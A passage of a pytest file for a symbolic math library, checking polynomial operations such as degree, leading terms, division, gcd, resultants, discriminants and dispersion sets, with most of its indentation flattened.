    pytest.raises(DomainError, lambda: (x*y).as_poly(x, y, domain=ZZ.inject(z)).eject(y))
assert (x*y).as_poly(x, y, z).eject(y) == (x*y).as_poly(x, z, domain=ZZ.inject(y))
def test_Poly_exclude():
assert x.as_poly(x, y).exclude() == x.as_poly()
assert (x*y).as_poly(x, y).exclude() == (x*y).as_poly(x, y)
assert Integer(1).as_poly(x, y).exclude() == Integer(1).as_poly(x, y)
assert (y**2 + y*z**2).as_poly(x, y, z).exclude() == (y**2 + y*z**2).as_poly(y, z)
def test_Poly__gen_to_level():
f = Integer(1).as_poly(x, y)
assert f._gen_to_level(-2) == 0
assert f._gen_to_level(-1) == 1
assert f._gen_to_level(+0) == 0
assert f._gen_to_level(+1) == 1
pytest.raises(PolynomialError, lambda: f._gen_to_level(-3))
pytest.raises(PolynomialError, lambda: f._gen_to_level(+2))
assert f._gen_to_level(x) == 0
assert f._gen_to_level(y) == 1
assert f._gen_to_level('x') == 0
assert f._gen_to_level('y') == 1
pytest.raises(PolynomialError, lambda: f._gen_to_level(z))
pytest.raises(PolynomialError, lambda: f._gen_to_level('z'))
def test_Poly_degree():
assert Integer(0).as_poly(x).degree() == -math.inf
assert Integer(1).as_poly(x).degree() == 0
assert x.as_poly().degree() == 1
assert Integer(0).as_poly(x).degree(gen=0) == -math.inf
assert Integer(1).as_poly(x).degree(gen=0) == 0
assert x.as_poly().degree(gen=0) == 1
assert Integer(0).as_poly(x).degree(gen=x) == -math.inf
assert Integer(1).as_poly(x).degree(gen=x) == 0
assert x.as_poly().degree(gen=x) == 1
assert Integer(0).as_poly(x).degree(gen='x') == -math.inf
assert Integer(1).as_poly(x).degree(gen='x') == 0
assert x.as_poly().degree(gen='x') == 1
f = Integer(1).as_poly(x)
pytest.raises(PolynomialError, lambda: f.degree(gen=1))
pytest.raises(PolynomialError, lambda: f.degree(gen=y))
pytest.raises(PolynomialError, lambda: f.degree(gen='y'))
assert Integer(1).as_poly(x, y).degree() == 0
assert (2*y).as_poly(x, y).degree() == 0
assert (x*y).as_poly(x, y).degree() == 1
assert Integer(1).as_poly(x, y).degree(gen=x) == 0
assert (2*y).as_poly(x, y).degree(gen=x) == 0
assert (x*y).as_poly(x, y).degree(gen=x) == 1
assert Integer(1).as_poly(x, y).degree(gen=y) == 0
assert (2*y).as_poly(x, y).degree(gen=y) == 1
assert (x*y).as_poly(x, y).degree(gen=y) == 1
assert degree(1, x) == 0
assert degree(x, x) == 1
assert degree(x*y**2, gen=x) == 1
assert degree(x*y**2, gen=y) == 2
assert degree(x*y**2, x, y) == 1
assert degree(x*y**2, y, x) == 2
pytest.raises(ComputationFailed, lambda: degree(1))
# issue sympy/sympy#20389
assert degree(x*(x + 1) - x**2 - x, x) == -oo
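# Performance guard (note the timeout below): the degree of (1 + x)**10000
# should be computed well within 30 seconds.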
@pytest.mark.timeout(30)
def test_sympyissue_6322():
assert degree((1 + x)**10000) == 10000
def test_Poly_degree_list():
assert [Integer(0).as_poly(x, y).degree(_) for _ in (x, y)] == [-math.inf]*2
assert [Integer(0).as_poly(x, y, z).degree(_) for _ in (x, y, z)] == [-math.inf]*3
assert [Integer(1).as_poly(x, y).degree(_) for _ in (x, y)] == [0, 0]
assert [Integer(1).as_poly(x, y, z).degree(_) for _ in (x, y, z)] == [0, 0, 0]
assert [(x**2*y + x**3*z**2 + 1).as_poly().degree(_)
for _ in (x, y, z)] == [3, 1, 2]
assert [degree(x*y**2, _) for _ in (x, y)] == [1, 2]
assert [degree(x**2 + y*x + 1, _) for _ in (x, y)] == [2, 1]
def test_Poly_total_degree():
assert (x**2*y + x**3*z**2 + 1).as_poly().total_degree() == 5
assert (x**2 + z**3).as_poly().total_degree() == 3
assert (x*y*z + z**4).as_poly().total_degree() == 4
assert (x**3 + x + 1).as_poly().total_degree() == 3
def test_Poly_LC():
assert Integer(0).as_poly(x).LC() == 0
assert Integer(1).as_poly(x).LC() == 1
assert (2*x**2 + x).as_poly().LC() == 2
assert (x*y**7 + 2*x**2*y**3).as_poly().LC('lex') == 2
assert (x*y**7 + 2*x**2*y**3).as_poly().LC('grlex') == 1
assert LC(x*y**7 + 2*x**2*y**3, order='lex') == 2
assert LC(x*y**7 + 2*x**2*y**3, order='grlex') == 1
pytest.raises(ComputationFailed, lambda: LC([1, 2]))
def test_Poly_TC():
assert Integer(0).as_poly(x).TC() == 0
assert Integer(1).as_poly(x).TC() == 1
assert (2*x**2 + x).as_poly().TC() == 0
def test_Poly_EC():
assert Integer(0).as_poly(x).EC() == 0
assert Integer(1).as_poly(x).EC() == 1
assert (2*x**2 + x).as_poly().EC() == 1
assert (x*y**7 + 2*x**2*y**3).as_poly().EC('lex') == 1
assert (x*y**7 + 2*x**2*y**3).as_poly().EC('grlex') == 2
def test_Poly_coeff():
f = Integer(0).as_poly(x)
assert f.coeff_monomial(1) == 0
assert f.coeff_monomial(x) == 0
assert f.coeff_monomial((0,)) == 0
assert f.coeff_monomial((1,)) == 0
f = Integer(1).as_poly(x)
assert f.coeff_monomial(1) == 1
assert f.coeff_monomial(x) == 0
assert f.coeff_monomial((0,)) == 1
assert f.coeff_monomial((1,)) == 0
f = (x**8).as_poly()
assert f.coeff_monomial(1) == 0
assert f.coeff_monomial(x**7) == 0
assert f.coeff_monomial(x**8) == 1
assert f.coeff_monomial(x**9) == 0
assert f.coeff_monomial((0,)) == 0
assert f.coeff_monomial((7,)) == 0
assert f.coeff_monomial((8,)) == 1
assert f.coeff_monomial((9,)) == 0
f = (3*x*y**2 + 1).as_poly()
assert f.coeff_monomial(1) == 1
assert f.coeff_monomial(x*y**2) == 3
assert f.coeff_monomial((0, 0)) == 1
assert f.coeff_monomial((1, 2)) == 3
p = (24*x*y*exp(8) + 23*x).as_poly(x, y)
assert p.coeff_monomial(x) == 23
assert p.coeff_monomial(y) == 0
assert p.coeff_monomial(x*y) == 24*exp(8)
assert p.as_expr().coeff(x) == 24*y*exp(8) + 23
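    # Poly.coeff itself is not implemented; use coeff_monomial() or, as
    # above, as_expr().coeff() instead.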
pytest.raises(NotImplementedError, lambda: p.coeff(x))
f = (x + 1).as_poly()
pytest.raises(ValueError, lambda: f.coeff_monomial(0))
pytest.raises(ValueError, lambda: f.coeff_monomial(3*x))
pytest.raises(ValueError, lambda: f.coeff_monomial(3*x*y))
pytest.raises(ValueError, lambda: (x*y + 1).as_poly().coeff_monomial((1,)))
assert (x**3 + 2*x**2 + 3*x).as_poly().coeff_monomial((2,)) == 2
assert (x**3 + 2*x*y**2 + y**2).as_poly().coeff_monomial((1, 2)) == 2
assert (4*sqrt(x)*y).as_poly().coeff_monomial((1, 1)) == 4
def test_Poly_LM():
assert Integer(0).as_poly(x).LM() == (0,)
assert Integer(1).as_poly(x).LM() == (0,)
assert (2*x**2 + x).as_poly().LM() == (2,)
assert (x*y**7 + 2*x**2*y**3).as_poly().LM('lex') == (2, 3)
assert (x*y**7 + 2*x**2*y**3).as_poly().LM('grlex') == (1, 7)
assert LM(x*y**7 + 2*x**2*y**3, order='lex') == x**2*y**3
assert LM(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
pytest.raises(ComputationFailed, lambda: LM([1, 2]))
def test_Poly_LM_custom_order():
f = (x**2*y**3*z + x**2*y*z**3 + x*y*z + 1).as_poly()
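    # The order= argument is given a plain key function here: rev_lex ranks
    # monomials by their reversed exponent tuples.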
def rev_lex(monom):
return tuple(reversed(monom))
assert f.LM(order='lex') == (2, 3, 1)
assert f.LM(order=rev_lex) == (2, 1, 3)
def test_Poly_EM():
assert Integer(0).as_poly(x).EM() == (0,)
assert Integer(1).as_poly(x).EM() == (0,)
assert (2*x**2 + x).as_poly().EM() == (1,)
assert (x*y**7 + 2*x**2*y**3).as_poly().EM('lex') == (1, 7)
assert (x*y**7 + 2*x**2*y**3).as_poly().EM('grlex') == (2, 3)
def test_Poly_LT():
assert Integer(0).as_poly(x).LT() == ((0,), 0)
assert Integer(1).as_poly(x).LT() == ((0,), 1)
assert (2*x**2 + x).as_poly().LT() == ((2,), 2)
assert (x*y**7 + 2*x**2*y**3).as_poly().LT('lex') == ((2, 3), 2)
assert (x*y**7 + 2*x**2*y**3).as_poly().LT('grlex') == ((1, 7), 1)
assert LT(x*y**7 + 2*x**2*y**3, order='lex') == 2*x**2*y**3
assert LT(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
pytest.raises(ComputationFailed, lambda: LT([1, 2]))
def test_Poly_ET():
assert Integer(0).as_poly(x).ET() == ((0,), 0)
assert Integer(1).as_poly(x).ET() == ((0,), 1)
assert (2*x**2 + x).as_poly().ET() == ((1,), 1)
assert (x*y**7 + 2*x**2*y**3).as_poly().ET('lex') == ((1, 7), 1)
assert (x*y**7 + 2*x**2*y**3).as_poly().ET('grlex') == ((2, 3), 2)
def test_Poly_clear_denoms():
coeff, poly = (x + 2).as_poly().clear_denoms()
assert coeff == 1 and poly == (x + 2).as_poly(domain=ZZ) and poly.domain == ZZ
coeff, poly = (x/2 + 1).as_poly().clear_denoms()
assert coeff == 2 and poly == (x + 2).as_poly(domain=QQ) and poly.domain == QQ
coeff, poly = (x/2 + 1).as_poly().clear_denoms(convert=True)
assert coeff == 2 and poly == (x + 2).as_poly(domain=ZZ) and poly.domain == ZZ
coeff, poly = (x/y + 1).as_poly(x).clear_denoms(convert=True)
assert coeff == y and poly == (x + y).as_poly(x, domain=ZZ.inject(y)) and poly.domain == ZZ.inject(y)
coeff, poly = (x/3 + sqrt(2)).as_poly(x, domain=EX).clear_denoms()
assert coeff == 3 and poly == (x + 3*sqrt(2)).as_poly(x, domain=EX) and poly.domain == EX
coeff, poly = (x/3 + sqrt(2)).as_poly(x, domain=EX).clear_denoms(convert=True)
assert coeff == 3 and poly == (x + 3*sqrt(2)).as_poly(x, domain=EX) and poly.domain == EX
def test_Poly_rat_clear_denoms():
f = (x**2/y + 1).as_poly(x)
g = (x**3 + y).as_poly(x)
assert f.rat_clear_denoms(g) == \
((x**2 + y).as_poly(x), (y*x**3 + y**2).as_poly(x))
f = f.set_domain(EX)
g = g.set_domain(EX)
assert f.rat_clear_denoms(g) == (f, g)
def test_Poly_integrate():
f = (x + 1).as_poly()
assert f.integrate() == (x**2/2 + x).as_poly()
assert f.integrate(x) == (x**2/2 + x).as_poly()
assert f.integrate((x, 1)) == (x**2/2 + x).as_poly()
assert (2*x + 1).as_poly().integrate(auto=False) == (x**2 + x).as_poly()
f = (x*y + 1).as_poly()
assert f.integrate(x) == (x**2*y/2 + x).as_poly()
assert f.integrate(y) == (x*y**2/2 + y).as_poly()
assert f.integrate(x, x) == (x**3*y/6 + x**2/2).as_poly()
assert f.integrate(y, y) == (x*y**3/6 + y**2/2).as_poly()
assert f.integrate((x, 2)) == (x**3*y/6 + x**2/2).as_poly()
assert f.integrate((y, 2)) == (x*y**3/6 + y**2/2).as_poly()
assert f.integrate(x, y) == (x**2*y**2/4 + x*y).as_poly()
assert f.integrate(y, x) == (x**2*y**2/4 + x*y).as_poly()
def test_Poly_diff():
f = (x**2 + x).as_poly()
assert f.diff() == (2*x + 1).as_poly()
assert f.diff(x) == (2*x + 1).as_poly()
assert f.diff((x, 1)) == (2*x + 1).as_poly()
# issue sympy/sympy#9585
assert diff(f) == (2*x + 1).as_poly()
assert diff(f, x, evaluate=False) == Derivative(f, x)
assert Derivative(f, x).doit() == (2*x + 1).as_poly()
assert f.diff(x, evaluate=False) == Derivative(f, x)
f = (x**2 + 2*x + 1).as_poly()
assert f.diff() == (2*x + 2).as_poly()
f = (x**2*y**2 + x*y).as_poly()
assert f.diff(x) == (2*x*y**2 + y).as_poly()
assert f.diff(y) == (2*x**2*y + x).as_poly()
assert f.diff(x, x) == (2*y**2).as_poly(x, y)
assert f.diff(y, y) == (2*x**2).as_poly(x, y)
assert f.diff((x, 2)) == (2*y**2).as_poly(x, y)
assert f.diff((y, 2)) == (2*x**2).as_poly(x, y)
assert f.diff(x, y) == (4*x*y + 1).as_poly()
assert f.diff(y, x) == (4*x*y + 1).as_poly()
f = (x*y**2 + x).as_poly()
assert f.diff((x, 0), (y, 1)) == (2*x*y).as_poly()
def test_Poly_eval():
f = Integer(0).as_poly(x)
assert f.eval(7) == 0
assert f.eval(0, 7) == 0
assert f.eval(x, 7) == 0
assert f.eval('x', 7) == 0
f = Integer(1).as_poly(x)
assert f.eval(7) == 1
assert f.eval(0, 7) == 1
assert f.eval(x, 7) == 1
assert f.eval('x', 7) == 1
pytest.raises(PolynomialError, lambda: f.eval(1, 7))
pytest.raises(PolynomialError, lambda: f.eval(y, 7))
pytest.raises(PolynomialError, lambda: f.eval('y', 7))
f = x.as_poly()
assert f.eval(7) == 7
assert f.eval(0, 7) == 7
assert f.eval(x, 7) == 7
assert f.eval('x', 7) == 7
f = Integer(123).as_poly(x, y)
assert f.eval(7) == Integer(123).as_poly(y)
assert f.eval(x, 7) == Integer(123).as_poly(y)
assert f.eval(y, 7) == Integer(123).as_poly(x)
f = (2*y).as_poly(x, y)
assert f.eval(7) == (2*y).as_poly()
assert f.eval(x, 7) == (2*y).as_poly()
assert f.eval(y, 7) == Integer(14).as_poly(x)
f = (x*y).as_poly()
assert f.eval(7) == (7*y).as_poly()
assert f.eval(x, 7) == (7*y).as_poly()
assert f.eval(y, 7) == (7*x).as_poly()
f = (x*y + y).as_poly()
assert f.eval({x: 7}) == (8*y).as_poly()
assert f.eval({y: 7}) == (7*x + 7).as_poly()
assert f.eval({x: 6, y: 7}) == 49
assert f.eval({x: 7, y: 6}) == 48
assert f.eval((6, 7)) == 49
assert f.eval([6, 7]) == 49
pytest.raises(ValueError, lambda: f.eval((6, 7, 8)))
f = (x + 1).as_poly()
assert f.eval(Rational(1, 2)) == Rational(3, 2)
assert f.eval(sqrt(2)) == sqrt(2) + 1
pytest.raises(DomainError, lambda: f.eval(Rational(1, 2), auto=False))
# issue sympy/sympy#6344
alpha = Symbol('alpha')
result = (2*alpha*z - 2*alpha + z**2 + 3)/(z**2 - 2*z + 1)
f = (x**2 + (alpha - 1)*x - alpha + 1).as_poly(x, domain=ZZ.inject(alpha))
assert f.eval((z + 1)/(z - 1)) == result
f = (x**2 + (alpha - 1)*x - alpha + 1).as_poly(x, y, domain=ZZ.inject(alpha))
assert f.eval((z + 1)/(z - 1)) == result.as_poly(y, domain=ZZ.inject(alpha, z).field)
def test_Poly___call__():
f = (2*x*y + 3*x + y + 2*z).as_poly()
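    # Calling a Poly substitutes values for its generators in order; any
    # leftover generators remain: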
assert f(2) == (5*y + 2*z + 6).as_poly()
assert f(2, 5) == (2*z + 31).as_poly()
assert f(2, 5, 7) == 45
def test_parallel_poly_from_expr():
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([]))
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([[1, 2]]))
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), x**2 - 1], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, (x**2 - 1).as_poly()], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr([(
x - 1).as_poly(), (x**2 - 1).as_poly()], x)[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([(
x - 1).as_poly(), x**2 - 1], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([x - 1, (
x**2 - 1).as_poly()], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr([(x - 1).as_poly(), (
x**2 - 1).as_poly()], x, y)[0] == [(x - 1).as_poly(x, y), (x**2 - 1).as_poly(x, y)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), x**2 - 1])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[x - 1, (x**2 - 1).as_poly()])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[(x - 1).as_poly(), (x**2 - 1).as_poly()])[0] == [(x - 1).as_poly(), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
        [Integer(1), x**2 - 1])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
        [Integer(1), (x**2 - 1).as_poly()])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
[1, (x**2 - 1).as_poly()])[0] == [Integer(1).as_poly(x), (x**2 - 1).as_poly()]
assert parallel_poly_from_expr(
        [x**2 - 1, Integer(1)])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
        [(x**2 - 1).as_poly(), Integer(1)])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr(
[(x**2 - 1).as_poly(), 1])[0] == [(x**2 - 1).as_poly(), Integer(1).as_poly(x)]
assert parallel_poly_from_expr([x.as_poly(x, y), y.as_poly(x, y)], x, y, order='lex')[0] == \
[x.as_poly(x, y, domain=ZZ), y.as_poly(x, y, domain=ZZ)]
pytest.raises(PolificationFailed, lambda: parallel_poly_from_expr([0, 1]))
assert (parallel_poly_from_expr([(x - 1)**2, 1], expand=False) ==
([((x - 1)**2).as_poly(x - 1, expand=False), Integer(1).as_poly(x - 1)],
{'domain': ZZ, 'expand': False, 'gens': (x - 1,),
'polys': False}))
def test_div():
f, g = x**2 - y**2, x - y
q, r = x + y, Integer(0)
F, G, Q, R = [h.as_poly(x, y) for h in (f, g, q, r)]
assert F.div(G) == (Q, R)
assert F.rem(G) == R
assert F.quo(G) == Q
assert F.exquo(G) == Q
assert div(f, g) == (q, r)
assert rem(f, g) == r
assert quo(f, g) == q
assert exquo(f, g) == q
assert div(f, g, x, y) == (q, r)
assert rem(f, g, x, y) == r
assert quo(f, g, x, y) == q
assert exquo(f, g, x, y) == q
assert div(F, G) == (Q, R)
assert rem(F, G) == R
assert quo(F, G) == Q
assert exquo(F, G) == Q
assert div(f, g, polys=True) == (Q, R)
assert rem(f, g, polys=True) == R
assert quo(f, g, polys=True) == Q
assert exquo(f, g, polys=True) == Q
assert div(F, G, polys=False) == (q, r)
assert rem(F, G, polys=False) == r
assert quo(F, G, polys=False) == q
assert exquo(F, G, polys=False) == q
pytest.raises(ComputationFailed, lambda: div(4, 2))
pytest.raises(ComputationFailed, lambda: rem(4, 2))
pytest.raises(ComputationFailed, lambda: quo(4, 2))
pytest.raises(ComputationFailed, lambda: exquo(4, 2))
f, g = x**2 + 1, 2*x - 4
qz, rz = 0, x**2 + 1
qq, rq = x/2 + 1, 5
assert div(f, g) == (qq, rq)
assert div(f, g, auto=True) == (qq, rq)
assert div(f, g, auto=False) == (qz, rz)
assert div(f, g, domain=ZZ) == (qz, rz)
assert div(f, g, domain=QQ) == (qq, rq)
assert div(f, g, domain=ZZ, auto=True) == (qq, rq)
assert div(f, g, domain=ZZ, auto=False) == (qz, rz)
assert div(f, g, domain=QQ, auto=True) == (qq, rq)
assert div(f, g, domain=QQ, auto=False) == (qq, rq)
assert rem(f, g) == rq
assert rem(f, g, auto=True) == rq
assert rem(f, g, auto=False) == rz
assert rem(f, g, domain=ZZ) == rz
assert rem(f, g, domain=QQ) == rq
assert rem(f, g, domain=ZZ, auto=True) == rq
assert rem(f, g, domain=ZZ, auto=False) == rz
assert rem(f, g, domain=QQ, auto=True) == rq
assert rem(f, g, domain=QQ, auto=False) == rq
assert quo(f, g) == qq
assert quo(f, g, auto=True) == qq
assert quo(f, g, auto=False) == qz
assert quo(f, g, domain=ZZ) == qz
assert quo(f, g, domain=QQ) == qq
assert quo(f, g, domain=ZZ, auto=True) == qq
assert quo(f, g, domain=ZZ, auto=False) == qz
assert quo(f, g, domain=QQ, auto=True) == qq
assert quo(f, g, domain=QQ, auto=False) == qq
f, g, q = x**2, 2*x, x/2
assert exquo(f, g) == q
assert exquo(f, g, auto=True) == q
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, auto=False))
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ))
assert exquo(f, g, domain=QQ) == q
assert exquo(f, g, domain=ZZ, auto=True) == q
pytest.raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ, auto=False))
assert exquo(f, g, domain=QQ, auto=True) == q
assert exquo(f, g, domain=QQ, auto=False) == q
f, g = (x**2).as_poly(), x.as_poly()
q, r = f.div(g)
assert q.domain.is_IntegerRing and r.domain.is_IntegerRing
r = f.rem(g)
assert r.domain.is_IntegerRing
q = f.quo(g)
assert q.domain.is_IntegerRing
q = f.exquo(g)
assert q.domain.is_IntegerRing
f, g, q = x**2 + 1, 2*x - 9, QQ(85, 4)
assert rem(f, g) == q
f, g = a*x**2 + b*x + c, 3*x + 2
assert div(f, g) == (a*x/3 - 2*a/9 + b/3, 4*a/9 - 2*b/3 + c)
f, g = (x + y).as_poly(x), (2*x + y).as_poly(x)
q, r = f.div(g)
assert q.domain.is_FractionField and r.domain.is_FractionField
def test_gcdex():
f, g = 2*x, x**2 - 16
s, t, h = x/32, -Rational(1, 16), Integer(1)
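    # Bezout identity: s*f + t*g == h, i.e. (x/32)*(2*x) - (x**2 - 16)/16 == 1.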
F, G, S, T, H = [u.as_poly(x, domain=QQ) for u in (f, g, s, t, h)]
assert F.half_gcdex(G) == (S, H)
assert F.gcdex(G) == (S, T, H)
assert F.invert(G) == S
assert half_gcdex(f, g) == (s, h)
assert gcdex(f, g) == (s, t, h)
assert invert(f, g) == s
assert half_gcdex(f, g, x) == (s, h)
assert gcdex(f, g, x) == (s, t, h)
assert invert(f, g, x) == s
assert half_gcdex(F, G) == (S, H)
assert gcdex(F, G) == (S, T, H)
assert invert(F, G) == S
assert half_gcdex(f, g, polys=True) == (S, H)
assert gcdex(f, g, polys=True) == (S, T, H)
assert invert(f, g, polys=True) == S
assert half_gcdex(F, G, polys=False) == (s, h)
assert gcdex(F, G, polys=False) == (s, t, h)
assert invert(F, G, polys=False) == s
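    # The same functions accept plain integers: -20*100 + 1*2004 == 4 ==
    # gcd(100, 2004), and 5 is the inverse of 3 modulo 7 (3*5 % 7 == 1).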
assert half_gcdex(100, 2004) == (-20, 4)
assert gcdex(100, 2004) == (-20, 1, 4)
assert invert(3, 7) == 5
pytest.raises(DomainError, lambda: half_gcdex(x + 1, 2*x + 1, auto=False))
pytest.raises(DomainError, lambda: gcdex(x + 1, 2*x + 1, auto=False))
pytest.raises(DomainError, lambda: invert(x + 1, 2*x + 1, auto=False))
def test_subresultants():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 2*x - 2
F, G, H = f.as_poly(), g.as_poly(), h.as_poly()
assert F.subresultants(G) == [F, G, H]
assert subresultants(f, g) == [f, g, h]
assert subresultants(f, g, x) == [f, g, h]
assert subresultants(F, G) == [F, G, H]
assert subresultants(f, g, polys=True) == [F, G, H]
assert subresultants(F, G, polys=False) == [f, g, h]
pytest.raises(ComputationFailed, lambda: subresultants(4, 2))
def test_resultant():
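    # The resultant vanishes exactly when the two polynomials share a root;
    # below, f and g both vanish at x = 1.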
f, g, h = x**2 - 2*x + 1, x**2 - 1, Integer(0)
F, G = f.as_poly(), g.as_poly()
assert F.resultant(G) == h
assert PurePoly(f).resultant(PurePoly(g)) == h
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(F, G) == h
assert resultant(f, g, polys=True) == h
assert resultant(F, G, polys=False) == h
assert resultant(f, g, includePRS=True) == (h, [f, g, 2*x - 2])
assert resultant(f, g, polys=True,
includePRS=True) == (0, [f, g, (2*x - 2).as_poly()])
f, g, h = x - a, x - b, a - b
F, G, H = f.as_poly(), g.as_poly(), h.as_poly()
assert F.resultant(G) == H
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(F, G) == H
assert resultant(f, g, polys=True) == H
assert resultant(F, G, polys=False) == h
pytest.raises(ComputationFailed, lambda: resultant(4, 2))
assert resultant(PurePoly(x**2 + y),
PurePoly(x*y - 1)) == PurePoly(y**3 + 1)
f = (x**4 - x**2 + 1).as_poly()
assert f.resultant((x**2 - y).as_poly()) == ((y**2 - y + 1)**2).as_poly()
assert f.resultant((x**3 - y).as_poly()) == ((y**2 + 1)**2).as_poly()
assert f.resultant((x**4 - y).as_poly()) == ((y**2 + y + 1)**2).as_poly()
assert f.resultant((x**12 - y).as_poly()) == ((y - 1)**4).as_poly()
def test_discriminant():
f, g = x**3 + 3*x**2 + 9*x - 13, -11664
F = f.as_poly()
assert F.discriminant() == g
assert discriminant(f) == g
assert discriminant(f, x) == g
assert discriminant(F) == g
assert discriminant(f, polys=True) == g
assert discriminant(F, polys=False) == g
f, g = a*x**2 + b*x + c, b**2 - 4*a*c
F, G = f.as_poly(), g.as_poly()
assert F.discriminant() == G
assert discriminant(f) == g
assert discriminant(f, x, a, b, c) == g
assert discriminant(F) == G
assert discriminant(f, polys=True) == G
assert discriminant(F, polys=False) == g
pytest.raises(ComputationFailed, lambda: discriminant(4))
def test_dispersion():
pytest.raises(AttributeError, lambda: (x*y).as_poly().dispersionset(x.as_poly()))
pytest.raises(ValueError, lambda: x.as_poly().dispersionset(y.as_poly()))
fp = Integer(0).as_poly(x)
assert fp.dispersionset() == {0}
fp = Integer(2).as_poly(x)
assert fp.dispersionset() == {0}
fp = (x + 1).as_poly()
assert fp.dispersionset() == {0}
fp = ((x + 1)*(x + 2)).as_poly()
assert fp.dispersionset() == {0, 1}
fp = (x**4 - 3*x**2 + 1).as_poly()
gp = fp.shift(-3)
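    # gp = fp(x - 3) translates every root of fp by +3; fp has pairs of roots
    # at distance exactly 1, so the dispersions are 3 - 1, 3 and 3 + 1.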
assert fp.dispersionset(gp) == {2, 3, 4}
assert gp.dispersionset(fp) == set()
fp = (x*(x + 3)).as_poly()
assert fp.dispersionset() == {0, 3}
fp = ((x - 3)*(x + 3)).as_poly()
assert fp.dispersionset() == {0, 6}
fp = (x**2 + 2*x - 1).as_poly()
gp = (x**2 + 2*x + 3).as_poly()
assert fp.dispersionset(gp) == set()
fp = (x*(3*x**2 + a)*(x - 2536)*(x**3 + a)).as_poly(x)
gp = fp.as_expr().subs({x: x - 345}).as_poly(x)
assert fp.dispersionset(gp) == {345, 2881}
assert gp.dispersionset(fp) == {2191}
fp = ((x - 2)**2*(x - 3)**3*(x - 5)**3).as_poly()
gp = (fp + 4)**2
assert fp.dispersionset() == {0, 1, 2, 3}
assert fp.dispersionset(gp) == {1, 2}
fp = (x*(x + 2)*(x - 1)).as_poly()
assert fp.dispersionset() == {0, 1, 2, 3}
fp = (x**2 + sqrt(5)*x - 1).as_poly(x)
gp = (x**2 + (2 + sqrt(5))*x + sqrt(5)).as_poly(x)
assert fp.dispersionset(gp) == {2}
assert gp.dispersionset(fp) == {1, 4}
    # There are some difficulties if we compute over Z[a]
    # and alpha happens to lie in Z[a] instead of simply Z.
    # Hence we cannot decide in general whether alpha is
    # indeed integral.
fp = (4*x**4 + (4*a + 8)*x**3 + (a**2 + 6*a + 4)*x**2 + (a**2 + 2*a)*x).as_poly(x)
assert fp.dispersionset() == {0, 1}
    # For any specific value of a, the dispersion is 3*a,
    # but the algorithm cannot find this in general.
    # This is the point where the resultant-based ansatz
    # is superior to the current one.
fp = (a**2*x**3 + (a**3 + a**2 + a + 1)*x).as_poly(x)
gp = fp.as_expr().subs({x: x - 3*a}).as_poly(x)
assert fp.dispersionset(gp) == set()
fpa = fp.as_expr().subs({a: 2}).as_poly(x)
gpa = gp.as_expr().subs({a: 2}).as_poly(x)
assert fpa.dispersionset(gpa) == {6}
def test_lcm():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert functools.reduce(lcm, F) == x**5 - x**4 - 2*x**3 - x**2 + x + 2
assert functools.reduce(lambda x, y: lcm(x, y, polys=True),
F) == (x**5 - x**4 - 2*x**3 - x**2 + x + 2).as_poly()
assert lcm(1, 2) == 2
assert functools.reduce(lcm, [4, 6, 8]) == 24
def test_gcd():
f, g = x**3 - 1, x**2 - 1
s, t = x**2 + x + 1, x + 1
h, r = x - 1, x**4 + x**3 - x - 1
F, G, S, T, H, R = [u.as_poly() for u in (f, g, s, t, h, r)]
assert F.cofactors(G) == (H, S, T)
assert F.gcd(G) == H
assert F.lcm(G) == R
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == r
assert cofactors(f, g, x) == (h, s, t)
assert gcd(f, g, x) == h
assert lcm(f, g, x) == r
assert cofactors(F, G) == (H, S, T)
assert gcd(F, G) == H
assert lcm(F, G) == R
assert cofactors(f, g, polys=True) == (H, S, T)
assert gcd(f, g, polys=True) == H
assert lcm(f, g, polys=True) == R
assert cofactors(F, G, polys=False) == (h, s, t)
assert gcd(F, G, polys=False) == h
assert lcm(F, G, polys=False) == r
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
assert cofactors(8, 6) == (2, 4, 3)
assert gcd(8, 6) == 2
assert lcm(8, 6) == 24
